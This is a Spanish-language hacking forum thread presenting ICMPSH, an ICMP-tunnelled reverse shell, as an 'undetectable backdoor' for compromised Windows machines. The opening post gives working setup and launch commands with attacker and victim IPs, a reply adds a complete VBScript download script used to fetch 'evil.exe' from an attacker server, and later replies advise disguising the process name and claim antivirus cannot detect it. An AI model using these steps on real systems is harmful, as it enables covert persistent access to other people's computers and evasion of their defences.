Puerta trasera indetectable para Windows 7/8/8.1/10

 Hola Underc0ders!

  Quiero compartir con ustedes este post sobre esta curiosa herramienta llamada ICMPSH, es un shell que funciona a través del protocolo ICMP modificando peticiones y respuestas ICMP  entre dos ordenadores. Esta herramienta no requiere permisos adminsitrativos  para ser ejecutado en el sistema víctima y no utiliza ningún puerto ya que funciona a través del protocolo ICMP, lo que la diferencia considerablemente de otras herramientas similares. Su uso es muy simple y esta "aparentemente" libre de código malicioso lo cual la convierte en una herramienta perfecta para dejar puertas traseras en Windows.
  El esclavo está programado en C y se ejecuta sólo en un ordenador con sistema operativo Windows mientras que el maestro o servidor se puede ejecutar en cualquier sistema operativo.
  La herramienta fue desarrollada por Nico Leidecker quien originalmente la escribió  en C y Perl. En este tutorial voy a usar la versión portada a Python, la cual puede encontrar en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


  Modo de uso:

  Las versiones escritas en C y Python no necesitan dependencias o librerías extras, antes de ejecutar el servidor en la maquina atacante (es este caso Parrot Security) es necesario desactivar las respuestas ICMP en el Sistema Operativo, para ello ejecutamos en siguiente comando:

┌─[root@parrot]─[~]
└──╼ # sysctl -w net.ipv4.icmp_echo_ignore_all=1

Descargamos la herramienta desde GitHub:

┌─[root@parrot]─[~]
└──╼ # git clone https://github.com/inquisb/icmpsh.git

Luego entramos en el directorio icmpsh y ejecutamos el Servidor:

┌─[root@parrot]─[~]
└──╼ # cd icmpsh
┌─[root@parrot]─[~/icmpsh]
└──╼ # python icmpsh.py 192.168.56.102 192.168.56.101

Nota: 192.168.56.102 es la IP del Atacante y 192.168.56.101 es la IP de la Victima.

En la máquina de la víctima usamos el cliente icmpsh.exe que está incluido en el repo que descargamos de GitHub, debemos copiarlo a la máquina víctima antes.

Ejemplo de uso:

C:\> icmpsh.exe -t 192.168.56.102

  El resultado sería una Shell de Windows en nuestro sistema atacante.

  Deben estar pensando "a que víctima se le ocurre ejecutar icmpsh.exe en CMD y luego mirar la ventana negra para que podamos jugar libremente con su Shell" ... También lo pensé cuando vi la herramienta y se me ocurrió usarla con estos fines, pero me dije: "es una excelente manera de dejar una puerta trasera indetectable por Antivirus y Firewalls en Windows", por supuesto, antes tenemos que comprometer la seguridad de ese equipo y obtener acceso remoto, de esta manera podemos dejar nuestras archivos de backdoor, totalmente indetectable.

  En este vídeo los dejo un ejemplo de cómo es el proceso para crear la puerta trasera, pueden seguir los pasos del vídeo en su Laboratorio Virtual para preparar la puerta trasera y luego subir los archivos desde una sesión meterpreter en el ordenador de la victima.



  Esto es todo por ahora, espero este post les paresca interesante y les sirva de ayuda en algún momento. Si tienes alguna duda con el procedimiento, déjenlas en los comentarios.

  Saludos... Happy Hacking

parece copado si deja un backdoor indetectable, voy a verlo

lo malo es que si no tenes ip reservation, por logica el ip del backdoor se caga. y otra cosa que no me dejo conectar a un servidor ftp para bajar y subir archivos, es un poco limitado

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

parece copado si deja un backdoor indetectable, voy a verlo

lo malo es que si no tenes ip reservation, por logica el ip del backdoor se caga. y otra cosa que no me dejo conectar a un servidor ftp para bajar y subir archivos, es un poco limitado

Bueno realmente desde esa shell se pueden hacer muchas cosas (hay que estudiarse un poquito cmd.exe), que prefieras un meterpreter ya es es otra cosa... es mucho más cómodo claro.
También esta la opción de escribir un wget en vbscript y bueno bajar lo que quieras desde un servidor http, no he probado este método con icpmsh, supongo que funcione bien, dejo el debate abierto para que prueben y les dejo el código a continuación.

wget en vbscript:

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

modo de uso:

cscript wget.vbs http://192.168.10.5/evil.exe evil.exe

también quiero mencionar que esta shell es una obción que tenemos para evadir Firewalls, IDS/IPS y AV, lo que seamos capaces de hacer a partir de ahí depende mucho de nosotros

Saludos!

una pregunta la victima se puede dar cuenta de esto ?

Esta muy bueno, ya que no necesita permisos de administrador, tiene evidentemente sus limitaciones como el hecho de que para hacer el wget puede tener problemas con el firewall, y posteriormente para ejecutar el evil.exe tambien deberia tener permisos de administrador (si la maquina esta configurada decentemente. )

Pero para tener una shell remota y escalar privilegios esta, muy pero muy bien.

Gracias por el aporte, tan pronto tenga tiempo la pruebo en un entorno virtualizado....

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
una pregunta la victima se puede dar cuenta de esto ?

Hola bro, realmente es muy dificil que la víctima se de cuenta ya que esta backdoor no utiliza ningun puerto, realmente no establese ninguna conexion por ningun puerto, son simples peticiones ICMP modificadas, lo que si puede ver la víctima es en los procesos de windows la backdoor en ejecución, cosa que se puede evitar o hacer dificil la detección  utilizando un buen nombre para el proceso o se apara la backdoor. Por lo demas ningun AV puede detectarla porque de cierta forma no es malware sino simples peticiones ICMP modificadas, para que en lugar de chequear la latencia envien estos paquetes de datos que contienen el acceso a la shell de windows y en la respuesta llegan los comandos que enviamos. Básicamente así es como funciona.

Saludos

También funciona en Kali?

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
También funciona en Kali?

Si colega, el ataque se puede realizar en cualquier sistema GNU/Linux